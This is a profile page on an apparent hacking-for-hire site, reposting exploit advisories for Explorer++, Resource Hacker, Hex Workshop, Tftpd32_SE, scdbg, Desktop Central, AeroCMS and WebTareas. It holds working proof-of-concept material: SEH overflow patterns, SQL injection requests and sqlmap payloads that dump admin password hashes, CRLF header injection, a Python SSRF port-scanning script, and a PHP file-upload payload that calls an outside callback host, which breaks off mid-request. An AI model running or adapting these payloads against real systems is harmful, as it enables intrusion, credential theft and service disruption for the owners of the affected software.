Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Explorer32++ v1.3.5.531 - Buffer overflow

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Explorer32++ 1.3.5.531 - Buffer overflow # Discovery by: Rafael Pedrero # Discovery Date: 2022-01-09 # Vendor Homepage: http://www.explorerplusplus.com/ # Software Link : http://www.explorerplusplus.com/ # Tested Version: 1.3.5.531 # Tested on: Windows 10 CVSS v3: 7.3 CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H CWE: CWE-119 Buffer overflow controlling the Structured Exception Handler (SEH) records in Explorer++ 1.3.5.531, and possibly other versions, may allow attackers to execute arbitrary code via a long file name argument. Proof of concept: Open Explorer32++.exe from command line with a large string in Arguments, more than 396 chars: File '<Explorer++_PATH>\Explorer32++.exe' Arguments 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4...' SEH chain of main thread Address SE handler 0018FB14 00690041 00370069 *** CORRUPT ENTRY *** 0BADF00D [+] Examining SEH chain 0BADF00D SEH record (nseh field) at 0x0018fb14 overwritten with unicode pattern : 0x00370069 (offset 262), followed by 626 bytes of cyclic data after the handler
  2. HireHackking

    Tftpd32_SE 4.60 - 'Tftpd32_svc' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Tftpd32_SE 4.60 - 'Tftpd32_svc' Unquoted Service Path # Discovery by: Ismael Nava # Discovery Date: 10-13-2022 # Vendor Homepage: https://pjo2.github.io/tftpd64/ # Software Links : https://bitbucket.org/phjounin/tftpd64/downloads/Tftpd32_SE-4.60-setup.exe # Tested Version: 4.60 # Vulnerability Type: Unquoted Service Path # Tested on OS: Microsoft Windows 10 Home 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ Tftpd32 service edition Tftpd32_svc C:\Program Files (x86)\Tftpd32_SE\tftpd32_svc.exe Auto C:\>sc qc Tftpd32_svc NOMBRE_SERVICIO: Tftpd32_svc TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Tftpd32_SE\tftpd32_svc.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Tftpd32 service edition DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
  3. HireHackking

    Resource Hacker v3.6.0.92 - Buffer overflow

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Resource Hacker 3.6.0.92 - Buffer overflow # Discovery by: Rafael Pedrero # Discovery Date: 2022-01-06 # Vendor Homepage: http://www.angusj.com/resourcehacker/ # Software Link : http://www.angusj.com/resourcehacker/ # Tested Version: 3.6.0.92 # Tested on: Windows 10 CVSS v3: 7.3 CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H CWE: CWE-119 Heap-based buffer overflow controlling the Structured Exception Handler (SEH) records in Reseource Hacker v3.6.0.92, and possibly other versions, may allow attackers to execute arbitrary code via a long file name argument. Proof of concept: Open ResHacker.exe from command line with a large string in Arguments, more than 268 chars: File 'C:\ResourceHacker36\ResHacker.exe' Arguments 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac...' SEH chain of main thread Address SE handler 0018FCB4 316A4130 6A413969 *** CORRUPT ENTRY *** 0BADF00D [+] Examining SEH chain 0BADF00D SEH record (nseh field) at 0x0018fcb4 overwritten with normal pattern : 0x6a413969 (offset 268), followed by 12 bytes of cyclic data after the handler 0BADF00D ------------------------------ 'Targets' => [ [ '<fill in the OS/app version here>', { 'Ret' => 0x00426446, # pop eax # pop ebx # ret - ResHacker.exe (change this value from Mona, with a not \x00 ret address) 'Offset' => 268 } ], ],
  4. HireHackking

    Aero CMS v0.0.1 - SQL Injection (no auth)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Aero CMS v0.0.1 - SQL Injection (no auth) # Date: 15/10/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: hub.woj12345@gmail.com # Vendor Homepage: https://github.com/MegaTKC/AeroCMS # Software Link: https://github.com/MegaTKC/AeroCMS # Version: 0.0.1 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ## Example SQL Injection ----------------------------------------------------------------------------------------------------------------------- Param: search ----------------------------------------------------------------------------------------------------------------------- Req sql ini detect ----------------------------------------------------------------------------------------------------------------------- POST /AeroCMS-master/search.php HTTP/1.1 Host: 127.0.0.1 Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57 Origin: http://127.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: http://127.0.0.1/AeroCMS-master/ Content-Type: application/x-www-form-urlencoded Accept-Language: en-US;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 21 search=245692'&submit= ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sat, 15 Oct 2022 03:07:06 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 3466 Connection: close Content-Type: text/html; charset=UTF-8 [...] Query failed You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%'' at line 1 ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- POST /AeroCMS-master/search.php HTTP/1.1 Host: 127.0.0.1 Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57 Origin: http://127.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: http://127.0.0.1/AeroCMS-master/ Content-Type: application/x-www-form-urlencoded Accept-Language: en-US;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 21 search=245692''&submit= ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sat, 15 Oct 2022 03:07:10 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 94216 [...] ----------------------------------------------------------------------------------------------------------------------- Req exploiting sql ini get data admin ----------------------------------------------------------------------------------------------------------------------- POST /AeroCMS-master/search.php HTTP/1.1 Host: 127.0.0.1 Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57 Origin: http://127.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: http://127.0.0.1/AeroCMS-master/ Content-Type: application/x-www-form-urlencoded Accept-Language: en-US;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 113 search=245692'+union+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12+from+users#&submit= ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sat, 15 Oct 2022 05:40:05 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 101144 [...] <a href="#">admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne,admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne</a> [...] ----------------------------------------------------------------------------------------------------------------------- Other URL and params ----------------------------------------------------------------------------------------------------------------------- /AeroCMS-master/admin/posts.php [post_title] /AeroCMS-master/admin/posts.php [filename] /AeroCMS-master/admin/profile.php [filename] /AeroCMS-master/author_posts.php [author] /AeroCMS-master/category.php [category] /AeroCMS-master/post.php [p_id] /AeroCMS-master/search.php [search] /AeroCMS-master/admin/categories.php [cat_title] /AeroCMS-master/admin/categories.php [phpwcmsBELang cookie] /AeroCMS-master/admin/posts.php [post_content] /AeroCMS-master/admin/posts.php [p_id] /AeroCMS-master/admin/posts.php [post_category_id] /AeroCMS-master/admin/posts.php [post_title] /AeroCMS-master/admin/posts.php [reset]
  5. HireHackking

    Scdbg 1.0 - Buffer overflow DoS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Scdbg 1.0 - Buffer overflow DoS # Discovery by: Rafael Pedrero # Discovery Date: 2021-06-13 # Vendor Homepage: http://sandsprite.com/blogs/index.php?uid=7&pid=152 # Software Link : https://github.com/dzzie/VS_LIBEMU # Tested Version: 1.0 - Compile date: Jun 3 2021 20:57:45 # Tested on: Windows 7, 10 CVSS v3: 7.5 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CWE: CWE-400 Vulnerability description: scdbg.exe (all versions) is affected by a Denial of Service vulnerability that occurs when you use the /foff parameter or not with a specific shellcode causing it to shutdown. Any malware could use this option to evade the scan. Proof of concept: Save this script like scdbg_crash.py and execute it: scdbg.exe -foff 1 -f scdbg_crash.bin / scdbg.exe -f scdbg_crash.bin #!/usr/bin/env python crash = "\x90\xF6\x84\x01\x90\x90\x90\x90" f = open ("scdbg_crash.bin", "w") f.write(crash) f.close() You can use gui_launcher.exe and check "Start offset 0x": 1 or directly without check [image: image.png]
  6. HireHackking

    Desktop Central 9.1.0 - Multiple Vulnerabilities

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Desktop Central 9.1.0 - Multiple Vulnerabilities # Discovery by: Rafael Pedrero # Discovery Date: 2021-02-14 # Software Link : http://www.desktopcentral.com # Tested Version: 9.1.0 (Build No: 91084) # Tested on: Windows 10 # Vulnerability Type: CRLF injection (CRLF) - 1 CVSS v3: 6.1 CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-93 Vulnerability description: CRLF injection vulnerability in ManageEngine Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via the fileName parameter in a /STATE_ID/1613157927228/InvSWMetering.csv. Proof of concept: GET https://localhost/STATE_ID/1613157927228/InvSWMetering.csv?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 DNT: 1 Connection: keep-alive Referer: https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering Upgrade-Insecure-Requests: 1 Content-Length: 0 Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084; STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228; showRefMsg=false; summarypage=false; DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1; JSESSIONID=0B20DEF653941DAF5748931B67972CDB; JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024 Host: localhost Response: HTTP/1.1 200 OK Date: Server: Apache Pragma: public Cache-Control: max-age=0 Expires: Wed, 31 Dec 1969 16:00:00 PST SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly; Secure Set-Cookie: buildNum=91084; Path=/ Set-Cookie: showRefMsg=false; Path=/ Set-Cookie: summarypage=false; Path=/ Set-Cookie: dc_customerid=1; Path=/ Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/ Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/ Set-Cookie: screenResolution=1280x1024; Path=/ Content-Disposition: attachment; filename=any Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013.csv X-dc-header: yes Content-Length: 95 Keep-Alive: timeout=5, max=20 Connection: Keep-Alive Content-Type: text/csv;charset=UTF-8 # Vulnerability Type: CRLF injection (CRLF) - 2 CVSS v3: 6.1 CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-93 Vulnerability description: CRLF injection vulnerability in ManageEngine Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via the fileName parameter in a /STATE_ID/1613157927228/InvSWMetering.pdf. Proof of concept: GET https://localhost/STATE_ID/1613157927228/InvSWMetering.pdf?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 DNT: 1 Connection: keep-alive Referer: https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering Upgrade-Insecure-Requests: 1 Content-Length: 0 Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084; STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228; showRefMsg=false; summarypage=false; DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1; JSESSIONID=0B20DEF653941DAF5748931B67972CDB; JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024 Host: localhost HTTP/1.1 200 OK Date: Server: Apache Pragma: public Cache-Control: max-age=0 Expires: Wed, 31 Dec 1969 16:00:00 PST SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly; Secure Set-Cookie: buildNum=91084; Path=/ Set-Cookie: showRefMsg=false; Path=/ Set-Cookie: summarypage=false; Path=/ Set-Cookie: dc_customerid=1; Path=/ Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/ Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/ Set-Cookie: screenResolution=1280x1024; Path=/ Content-Disposition: attachment; filename=any Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013 X-dc-header: yes Content-Length: 4470 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf;charset=UTF-8 # Vulnerability Type: Server-Side Request Forgery (SSRF) CVSS v3: 8.0 CVSS vector: CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H CWE: CWE-918 Server-Side Request Forgery (SSRF) Vulnerability description: Server-Side Request Forgery (SSRF) vulnerability in ManageEngine Desktop Central 9.1.0 allows an attacker can force a vulnerable server to trigger malicious requests to third-party servers or to internal resources. This vulnerability allows authenticated attacker with network access via HTTP and can then be leveraged to launch specific attacks such as a cross-site port attack, service enumeration, and various other attacks. Proof of concept: Save this content in a python file (ex. ssrf_manageenginedesktop9.py), change the variable sitevuln value with ip address: import argparse from termcolor import colored import requests import urllib3 import datetime urllib3.disable_warnings() print(colored(''' ------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------ ''',"red")) def smtpConfig_ssrf(target,port,d): now1 = datetime.datetime.now() text = '' sitevuln = 'localhost' url = 'https:// '+sitevuln+'/smtpConfig.do?actionToCall=valSmtpConfig&smtpServer='+target+'&smtpPort='+port+'&senderAddress=admin% 40manageengine.com &validateUser=false&tlsEnabled=false&smtpsEnabled=false&toAddress=admin% 40manageengine.com' cookie = 'DCJSESSIONID=A9F4AB5F4C43AD7F7D2C4D7B002CBE73; buildNum=91084; showRefMsg=false; dc_customerid=1; summarypage=false; JSESSIONID=D10A9C62D985A0966647099E14C622F8; DCJSESSIONIDSSO=DFF8F342822DA6E2F3B6064661790CD0' try: response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3','Referer': ' https://192.168.56.250:8383/smtpConfig.do','Cookie': cookie,'Connection': 'keep-alive'},verify=False, timeout=10) text = response.text now2 = datetime.datetime.now() rest = (now2 - now1) seconds = rest.total_seconds() if ('updateRefMsgCookie' in text): return colored('Cookie lost',"yellow") if d == "0": print ('Time response: ' + str(rest) + '\n' + text + '\n') if (seconds > 5.0): return colored('open',"green") else: return colored('closed',"red") except: now2 = datetime.datetime.now() rest = (now2 - now1) seconds = rest.total_seconds() if (seconds > 10.0): return colored('open',"green") else: return colored('closed',"red") return colored('unknown',"yellow") if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('-i','--ip', help="ManageEngine Desktop Central 9 - SSRF Open ports",required=True) parser.add_argument('-p','--port', help="ManageEngine Desktop Central 9 - SSRF Open ports",required=True) parser.add_argument('-d','--debug', help="ManageEngine Desktop Central 9 - SSRF Open ports (0 print or 1 no print)",required=False) args = parser.parse_args() timeresp = smtpConfig_ssrf(args.ip,args.port,args.debug) print (args.ip + ':' + args.port + ' ' + timeresp + '\n') And: $ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 8080 ------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------ 192.168.56.250:8080 open $ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 7777 ------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------ 192.168.56.250:7777 closed
  7. HireHackking

    Hex Workshop v6.7 - Buffer overflow DoS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Hex Workshop v6.7 - Buffer overflow DoS # Discovery by: Rafael Pedrero # Discovery Date: 2022-01-06 # Vendor Homepage: http://www.bpsoft.com, http://www.hexworkshop.com # Software Link : http://www.bpsoft.com, http://www.hexworkshop.com # Tested Version: v6.7 # Tested on: Windows 10 CVSS v3: 7.3 CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H CWE: CWE-119 Hex Workshop v6.7 is vulnerable to denial of service via a command line file arguments and control the Structured Exception Handler (SEH) records. Proof of concept: Open HWorks32.exe from command line with a large string in Arguments, more than 268 chars: File 'C:\Hex Workshop\HWorks32.exe' Arguments 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag..." 0BADF00D [+] Examining SEH chain 0BADF00D SEH record (nseh field) at 0x0089e63c overwritten with unicode pattern : 0x00390069 (offset 268), followed by 0 bytes of cyclic data after the handler The application crash.
  8. HireHackking

    WebTareas 2.4 - SQL Injection (Unauthorised)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WebTareas 2.4 - SQL Injection (Unauthorised) # Date: 15/10/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: hub.woj12345@gmail.com # Vendor Homepage: https://sourceforge.net/projects/webtareas/ # Software Link: https://sourceforge.net/projects/webtareas/ # Version: 2.4 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ## Example ----------------------------------------------------------------------------------------------------------------------- Param: webTareasSID in cookie ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- GET /webtareas/administration/admin.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/webtareas/general/login.php?msg=logout Connection: close Cookie: webTareasSID=Mt%ezS%00%07contCtxNzS%00%06_itemsVl%00%00%00%02S%00%03fooS%00%03barzzR%00%00%00%01Mt%001com.sun.org.apache.xpath.internal.objects.XStringS%00%05m_objS%00%04%eb%a7%a6%0f%1a%0bS%00%08m_parentNzR%00%00%00%12z'' Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 302 Found Date: Sat, 15 Oct 2022 11:38:50 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 X-Powered-By: PHP/7.4.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: ../service_site/home.php?msg=permissiondenied Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- GET /webtareas/administration/admin.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/webtareas/general/login.php?msg=logout Connection: close Cookie: webTareasSID=Mt%ezS%00%07contCtxNzS%00%06_itemsVl%00%00%00%02S%00%03fooS%00%03barzzR%00%00%00%01Mt%001com.sun.org.apache.xpath.internal.objects.XStringS%00%05m_objS%00%04%eb%a7%a6%0f%1a%0bS%00%08m_parentNzR%00%00%00%12z' Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 302 Found Date: Sat, 15 Oct 2022 11:38:39 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 X-Powered-By: PHP/7.4.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: ../service_site/home.php?msg=permissiondenied Content-Length: 355 Connection: close Content-Type: text/html; charset=UTF-8 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'javax.naming.spi.ContinuaS' at line 1(1064)<br /> <b>Warning</b>: Unknown: Failed to write session data using user defined save handler. (session.save_path: E:\xampp_php7\tmp) in <b>Unknown</b> on line <b>0</b><br /> ----------------------------------------------------------------------------------------------------------------------- SQLMap: ----------------------------------------------------------------------------------------------------------------------- sqlmap resumed the following injection point(s) from stored session: --- Parameter: Cookie #1* ((custom) HEADER) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: webTareasSID=Mt%00%00Mt%00%17com.caucho.naming.QNameS%00%08_contextMt%00' AND (SELECT 7431 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(7431=7431,1))),0x71716a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wBnB; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: webTareasSID=Mt%00%00Mt%00%17com.caucho.naming.QNameS%00%08_contextMt%00' AND (SELECT 7004 FROM (SELECT(SLEEP(5)))BFRG)-- Oamh; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1 [11:49:03] [INFO] testing MySQL [11:49:03] [INFO] confirming MySQL do you want to URL encode cookie values (implementation specific)? [Y/n] Y [11:49:03] [INFO] the back-end DBMS is MySQL web application technology: PHP 7.4.30, Apache 2.4.54 back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) [11:49:03] [INFO] fetching database names [11:49:04] [INFO] starting 6 threads [11:49:06] [INFO] retrieved: 'zxcv' [11:49:06] [INFO] retrieved: 'information_schema' [11:49:06] [INFO] retrieved: 'performance_schema' [11:49:06] [INFO] retrieved: 'test' [11:49:06] [INFO] retrieved: 'phpmyadmin' [11:49:06] [INFO] retrieved: 'mysql' available databases [6]: [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] test [*] zxcv [11:49:06] [INFO] fetched data logged to text files under 'C:\Users\48720\AppData\Local\sqlmap\output\127.0.0.1' [11:49:06] [WARNING] your sqlmap version is outdated [*] ending @ 11:49:06 /2022-10-15/
  9. HireHackking

    Aero CMS v0.0.1 - PHP Code Injection (auth)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Aero CMS v0.0.1 - PHP Code Injection (auth) # Date: 15/10/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: hub.woj12345@gmail.com # Vendor Homepage: https://github.com/MegaTKC/AeroCMS # Software Link: https://github.com/MegaTKC/AeroCMS # Version: 0.0.1 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ## Example ----------------------------------------------------------------------------------------------------------------------- Param: image content uploading image ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- POST /AeroCMS-master/admin/posts.php?source=add_post HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------369779619541997471051134453116 Content-Length: 1156 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/AeroCMS-master/admin/posts.php?source=add_post Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="post_title" mmmmmmmmmmmmmmmmm -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="post_category_id" 1 -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="post_user" admin -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="post_status" draft -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="image"; filename="at8vapghhb.php" Content-Type: text/plain <?php printf("bh3gr8e32s".(7*6)."ci4hs9f43t");gethostbyname("48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oasti"."fy.com");?> -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="post_tags" -----------------------------369779619541997471051134453116 Content-Disposition: 